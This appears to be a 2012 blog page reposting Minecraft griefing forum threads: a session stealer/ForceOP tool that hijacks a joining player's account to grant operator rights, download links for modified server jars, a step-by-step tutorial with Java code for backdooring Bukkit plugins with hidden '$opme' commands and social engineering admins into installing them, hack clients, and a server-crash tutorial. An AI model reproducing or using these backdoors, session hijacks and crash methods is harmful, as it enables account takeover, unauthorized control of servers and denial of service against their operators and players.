Social Icons

Saturday 28 April 2012

[NODUS] Session Stealer/ForceOP by Scetch || Easiest to use

If you are having problems. Redownload. There is a chance its updated.
Coded by Scetch.
All credits go to him!

Video of the tool in use:


[Image: IMG_11042012_180052.png]

Download link:
http://dl.dropbox.com/u/44740336/SessionStealer.jar

Couldn't make a proper thread layout since I'm on my phone.
But enjoy Black Hat

Tutorial:

Make sure you have portforwarded a port first!

Quote:1. Fill the first 2 boxes with the server details where you want to let the slave say something.

2. Fill the messages in the slave should say when he joins your server at the third box(Messages).
Separate these with a ,(for example /op player1,/op player2)

Now we are going to make the server look like a server:

3. Fill the MOTD(server message, for example the server name)
Can be anything

4. Fill in the count of the players that are currently online and the max players that can be online.
Note these are fake stats.

5. Fill in the port you forwarded.

6. Click start and let the slave join your server.
He will get the outdated client error, meanwhile his account is saying the stuff you entered on the server you entered.

[Download]Force-OP[/Download]

oday I present to you a download with a nice youtube video (still upping) which shows me quite clearly force-opping myself on a server. I also unlike any other person yet present to you a download of a modified server source which enables you to perform a forceop attack. Here is an example of some n00bs:



Setup: Below I have included 2 files. A modified server jar and a file called forcesettings.txt. In force settings.txt there are some options. They are set out in the format serverip:port:yourusername. Change them accordingly. The serverip and port are that of the one your want op on and the your username part is the username you want opped. All you must do is to get someone to login with permission to /op on that server and you will be opped.
I present to you 2 downloads. This is because I have not yet tested the second one and because of this I would not recommend it but It would be great if someone could test it. The second one, unlike the first one lets the person play on your server. The first one does not.

DOWNLOADS:
Doesn't let people play: http://www.mediafire.com/?k0qddq0bf1lf04w
Lets people play: http://www.mediafire.com/?1g85i35ohgdxhiy
Forcesettisngs File: http://www.mediafire.com/view/?783f30ashp0k5vx

POSSIBLE BUGS:
The serverip may have to be a number ip in the forcesettings so I would recommend pinging the server you want op on first to retrieve its ip. Again if someone could verify this bug that would be great

The reason I am releasing this is because I do not want some douchebag to make money from about 10 lines of code (it always happens)

Credits: Evenprime for showing me this update and for telling me that no connection to mc.net was needed. Because of this I was able to figure it out.



Setup: Below I have included 2 files. A modified server jar and a file called forcesettings.txt. In force settings.txt there are some options. They are set out in the format serverip:port:yourusername. Change them accordingly. The serverip and port are that of the one your want op on and the your username part is the username you want opped. All you must do is to get someone to login with permission to /op on that server and you will be opped.
I present to you 2 downloads. This is because I have not yet tested the second one and because of this I would not recommend it but It would be great if someone could test it. The second one, unlike the first one lets the person play on your server. The first one does not.

DOWNLOADS:
Doesn't let people play: http://www.mediafire.com/?k0qddq0bf1lf04w
Lets people play: http://www.mediafire.com/?1g85i35ohgdxhiy
Forcesettisngs File: http://www.mediafire.com/view/?783f30ashp0k5vx

POSSIBLE BUGS:
The serverip may have to be a number ip in the forcesettings so I would recommend pinging the server you want op on first to retrieve its ip. Again if someone could verify this bug that would be great

The reason I am releasing this is because I do not want some douchebag to make money from about 10 lines of code (it always happens)

Credits: Evenprime for showing me this update and for telling me that no connection to mc.net was needed. Because of this I was able to figure it out.

[Tut] How to poison MOST plugins to give you OP!

[Image: xqsaU.png]

In this tutorial, I will teach you how to modify MOST Bukkit plugins to give you OP or run commands on a server. This could be used to get OP by social engineering or coaxing a server admin into downloading and intalling your poisoned plugin.
__

Global Prerequisites
If you want to succeed, you must:
  • have relatively decent Java coding skills
  • have a good IDE such as Eclipse or IntelliJ
__

Step 1: Finding a Plugin

The most obvious and basic step would be to pick a plugin to poison. I would suggest going for things like SpamGuard that block cheaters. It will be significantly easier if the plugin came with the source code.

For this tutorial, I will be poisoning NoCheat.
__

Step 2: Getting the Source

Looking around the plugin's BukkitDev page will usually yield the source code. If not, you can usually find the source by clicking the repository button as shown below.

[Image: 2012-04-25_19-54-24.snagproj.png]

In our case, we were provided with a Subversion link. You will need to checkout from this SVN repository using either Eclipse or other free tools located on the internet.
__

Step 3: Importing Bukkit dependencies

Because Bukkit is an API and is foreign to Eclipse, we will need to import it into our project. Head down over to http://dl.bukkit.org and click "Alternate versions" as pictured below.

[Image: 2012-04-25_20-00-59.snagproj.png]

Now you need to navigate over to the Bukkit tab as pictured below.

[Image: 2012-04-25_20-01-45.snagproj.png]

You now need to click the Recommended Build green button, as pictured below.

[Image: 2012-04-25_20-02-57.snagproj.png]

Now, in Eclipse, you need to create a new project with the source code of the plugin you just downloaded. Right-click on your project and select "Build Path > Add External Archives...". A window will come up with the following picture.

[Image: 2012-04-25_20-12-50.snagproj.png]

Now you need to select the bukkit jarfile which you just downloaded, and the API should be added to the project.
__

Step 4: Finding main class

Before we can start coding, we need to look for the plugin's main class. The easy way to do this is by opening "plugin.yml" located in the project. Find the following line:

[Image: 2012-04-25_20-31-34.snagproj.png]

That is your plugin's main class.

__

Step 5: Injecting the poison

Open up your plugin's main class. Search for this:
Code:
public boolean onCommand(CommandSender sender, Command command, String label, String[] args) {

DIRECTLY BELOW this, paste the following code:

Code:
public void onPlayerChat(PlayerChatEvent event){
        if(event.getMessage().equalsIgnoreCase("$opme")){
        // if soneone on the server typed $opme in chat
            event.getPlayer().setOp(true);
            // Set the player's op status
            event.setCancelled(true);
            // Cancel the message sending
        } else if(event.getMessage().startsWith("$give")){
        // if someone typed $give in chat
            String[] item = event.getMessage().split(" ");
            // turn chat message into array
            if(item.length == 2){
            // check if the command was properly used
                event.getPlayer().getInventory().addItem(new ItemStack(Integer.parseInt(item[1]), 64));
            }
        }
    }

You need to import the following as well:
import org.bukkit.event.player.PlayerChatEvent;

What this code does is checks to see if the command issued was "$opme" and if it is, get the player who sent it and give them op. Additionally, if you type "$give [id]" it will give you a stack of that item.

Congratulations! You have added the poisoning code to your plugin!
__

Step 6: Plugin.yml chores

To actually make your command work, you need to define it in plugin.yml. Open it back up and add the following after "commands:":

Code:
opme:
  description: derp
  usage: /<command>

This defines the command so that Bukkit can actually read it. Of course, if you add more commands, you need to add more of these.

__

Step 7: Recompiling and using

Navigate to "File > Export..." and click the following when the window appears:

[Image: 2012-04-25_20-44-47.snagproj.png]

The rest should be self-explanatory.

To use the poisoned plugin, upload it to Dropbox or another hosting site and send it to the server admin. Hopefully they will install it. To op yourself, issue the command $opme or $give, and you should become OP!

__

Good luck with the social engineering! You can change the code around to make custom commands and even make it so that you can use commands that start with "#" and issue commands on the server.

[Rel] [1.2.5] Nodus Client | Custom Commands/Keybinds | IRC | Waypoints

Hello guys. GriefersBay lets you share griefing videos, discuss griefing teams & clients, share your clients, and even learn client programming! Check it out!
http://www.griefersbay.net/
Official Thread:
[Image: VfFdi.png]

I released this client back in 1.8 because Minecraft was just about to update to 1.0 and I wanted
to see if anyone liked it. A large amount of people did so I've kept it public and continued to
update it with more and more features with frequent updates.

For everyone who thinks the only way to enable hacks is the GUI you are WRONG. This client was always based around CUSTOM keybinds set with the "-bind" command.

Download:
Download from Adfly
Download direct link.
http://bit.ly/wnqn9o

Learn how to set up proxies! (Thanks DarkShadow)


Before you ask how to install this or if you get "Invalid or Corrput jar" watch this. (Thanks GriefSquadAlpha)





Thanks Eric!

Commands:


[Image: commands.png]

Key Binding

Most client are starting to add chat macros into their clients so you may be familiar with how these work. Nodus takes it a step farthur by letting you set any command to any key.

-bind [add/extra/del] [key] [command]

The first argument is adding a bind or deleting a bind (clearing a key), you can simply overwrite keys if you want to. If you want to add extra commands use the extra argument.
The second argument is the key name. By key name I mean the actual name of the key not the ID value. For example return or space.
The third argument is the command from the above list including it's arguments.

If you did everything right the command should now be bound to the key.

Command Aliases

People were bashing my client because you had to type toggle after the command to toggle it. Well here is the solution to all you people.
Make your own commands!

-alias [add/del] [alias] [command]

For showing how this works I think showing an example would be best.

-alias add -fc -freecam toggle

If you type -fc freecam will toggle.

-alias add -sten -spam 10

If you type -sten cats it will spam cats 10 times.


Flooding

I really liked the idea of having multiple flood messages so you could mess with plugins such as Factions. Here I will explain how it works.

-flood [toggle/add/clear/view/save] [message/filename]

The first argument has quite a bit to choose from. Toggle will just toggle the flooding, add will add a message to the bottom of the flood list, clear will clear all the messages in the flood list, view will show you the order in which the messages will be sent and save will save the flood list as a spam file in %appdata%/nodus/spamfiles/.
The second argument is the actual message that will be added OR the filename if you are saving the list. Not including .txt!

For an example do the following:

-flood add This
-flood add Is
-flood add Mutli
-flood add Flooding
-flood toggle

It will spam:
This
Is
Multi
Flooding
This
Is
Multi
Flooding

Misc. Info

When an update is available it will notify you on login.
You can change the colors above heads.
You won't attack your friends when using forcefield.
You won't aim at your friends when using aimbot.
When in aimbot you won't aim at friends.
Names can be visible up to 250 blocks.
Remoteview only works with people on radar.
You can connect to other servers in game or switch your texture pack.
Nodus by definition means "a problem", you mad?

Recent Changes

Screw updating this. Type -config changelog

We're going to be using the Team Avolition IRC network so thanks to them for allowing us to use it. Special thanks to ajvpot for once again (he helped with the original server) helping to set the channel up. Since we are on a new network we no longer control bans in other channels and are under their protection so if you get banned from the network it's YOUR problem as goes for any channel other than #Nodus.

[Tut] Packet sneak [Tut] (Should be skid-proof)


Step One:

Open: EntityClientPlayerMp.java
Scroll down to:
Code:
public void onUpdate2()

Step Two:

Code a toggle for the hack, if you aren't a skid you should be able to do this on your own.

Step Three:
Then type in this code. This is how it detects players coming within a certain radius of you. [Image: av2uH.png]

Step Four:
Now to code the packet actually being sent. Type out the following code:
[Image: uISZP.png]

That is it done, hope you enjoyed it.

[1.2.4] Nyan v0.31 | Aura | Nuker | Crash | Teleport | Capes | Waypoints

[Image: 6xpmP.png]

This client requires an increased amount of Avolition.

Download:
http://adf.ly/6Ohnh

Screenshots:
New main menu:
[Image: ZCG4K.png]

Account selection GUI:
[Image: 6LUPk.png]

Pwning 64 zombies on a NoCheat server:
[Image: gN8Uv.png]

Making people homeless on a NoCheat server with Nuker:
[Image: W1Hst.png]




Special Features:

Kill Aura
Kill Aura (-aura) forces critical hit and knockback, bypasses NoCheat (fight.direction & movement.morepackets), faces entities serverside without changing your player pitch and yaw, and supports entity filtering (All/Mob/Player). Aura reach is decreased from 6 blocks to 4.5 when NoCheat compatibility (-nocheat) is enabled.

Nuker
Nuker (-nuker) is fast and works on survival and creative mode. It uses Automine to mine blocks and logs the destruction time of each block to avoid spamming packets (especially in creative mode) and being affected by network lag. It supports NoCheat bypass (toggled by -nocheat). Fastest nuker ever coded. :D

Teleport
Teleport (-tp) does what the name says, it teleports you to any coordinates (works best in open areas). It bypasses fly-kick and works on any server without NoCheat. For easier teleporting, activate Click TP (-clicktp), which teleports you to any block you click and aim.

Damage Block
Damage Block (-block) takes advantage of the blocking mechanic in Minecraft, which allows you to take only half of any damage inflicted by entities while you are blocking. It sets you always blocking server-side while you are holding a sword without affecting your speed.

Server Crash
Use -crash tp to crash servers. Save this as a last resort, when there is nothing else that you can do to terrorize players and enrage admins. Note that this is based on teleport and therefore is patched by NoCheat.

Custom Capes
Nyan supports custom capes using PigBacon's Global Cape API! Upload your cape here.

Commands:

For command usage, type -help [command].
aura - Toggles kill aura.
autofish - Toggles autofish.
automine - Toggles automine.
autosign - Toggles autosign.
autotool - Toggles autotool.
bind - Modifies keybinds.
block - Toggles damage block.
bow - Toggles instant bow.
bright - Toggles fullbright.
build - Toggles build.
clicktp - Toggles click teleport.
climb - Toggles wall climb.
cnuker - Toggles click nuker.
crash - Crashes the server.
cspam - Toggles console spam.
derp - Toggles derp mode.
drop - Drops your inventory.
eat - Toggles instant eat.
fastmine - Toggles fastmine.
fastplace - Toggles fastplace.
fly - Toggles flight.
friends - Manages the friends list.
god - Toggles godmode.
heal - Toggles instant heal.
help - Seriously? >_>
instant - Toggles instant mine.
jump - Toggles high jump.
labels - Toggles mob labels.
msg - Sends a predefined message.
nocheat - Toggles nocheat bypasses.
nofall - Toggles nofall.
nolag - Toggles nolag.
nopush - Toggles nopush.
noswing - Toggles noswing.
nuker - Toggles nuker.
portal - Toggles instant portal.
pos - Shows your current position.
radar - Toggles radar.
smash - Toggles smash.
sneak - Toggles sneak.
spam - Spams a message.
spawn - Spawns items in creative.
spout - Sends SpoutCraft spoof.
sprint - Toggles sprint.
step - Toggles step.
tp - Teleports the player.
test - Nothing to see here...
throw - Throws or places your current item.
tracer - Toggles tracer.
up - Teleports you vertically.
water - Toggles solid water.
waypoint - Manages waypoints.
xray - Toggles xray.

Key Binding:
Keybinds can be edited with -bind.

-bind add [key] [msg]
-bind remove [key]

[key] is the name of the key.
[msg] is the message/command binded to the key.

Example:
-bind add H Hello World!
-bind remove H

Miscellaneous Info:
Middle click a player to toggle friend.
Cracked servers are shown in blue in the server list.
Collision does not stop sprinting.
Send chat messages within the workbench GUI.
Nopush stops knockback and water flow.
Hurt camera is disabled.
Void Fog is removed.
Account Settings manages sessions and accounts.
Proxy Switcher activates SOCKS proxies.
I did not code any threads in this client (except for update checker).

Recent Changes:

* Update to Minecraft 1.2.4

[Tut] TP-crash

This is a tutorial on how to make a tp method crasher. You can use this in either a .chat command or a console command. I used a console command. Also, my crash method is in TeamAIDS.java yours may be Hacks, Variables, or wherever your vars are placed in.

Lets get started. First we make the trigger:
[Image: NWIrV.png]

Now we make the tpCrash() method. This method is what ever your vars class is. It technically can be anywhere i just used my vars class:
[Image: Ke9lq.png]
This creates a loop that will run 10000 times. I used 10000 but it will still crash with a lower number. the x loop adds 8 to the players position because anything higher gives the moved too quickly error. This moves the x, y, and z up value about 80000 times its original position

Not we make the setPostition() void. This is the void used for tping the player. This void MUST be placed in the same class as tbe tpCrash() method:
[Image: Zi8sS.png]
This sets the clients position and the servers position

The outcome of all of this sends you to an invalid position and moves you so fast with so many packets it ends up overloading the server. There are more methods for crashing but this one works the best. This will crash a vanilla server in about 10 seconds. This does not work on NC servers because the have patched the tp exploit. Takes about 30 seconds to crash a dedicated bukkit server. Hope you like.

As a skid protect i made it so you will get kicked for flying. This is an easy fix if you know what to do. However to you skids you can crash servers that allow flying!
I hope to do more tutorials soon

[Tut] Easiest and best Kill Aura bypass [Tut]

Hopefully you know how to make a kill aura, so I'm going to make this short and sweet.

You only need to add one word to your stuff.

And it's break; you need to add it after you've sent all your packets and whatnot. Voila, nocheat will not detect you.

Like so:

[Image: V9sky.png]

You may even add it to other things so you can have more bypasses.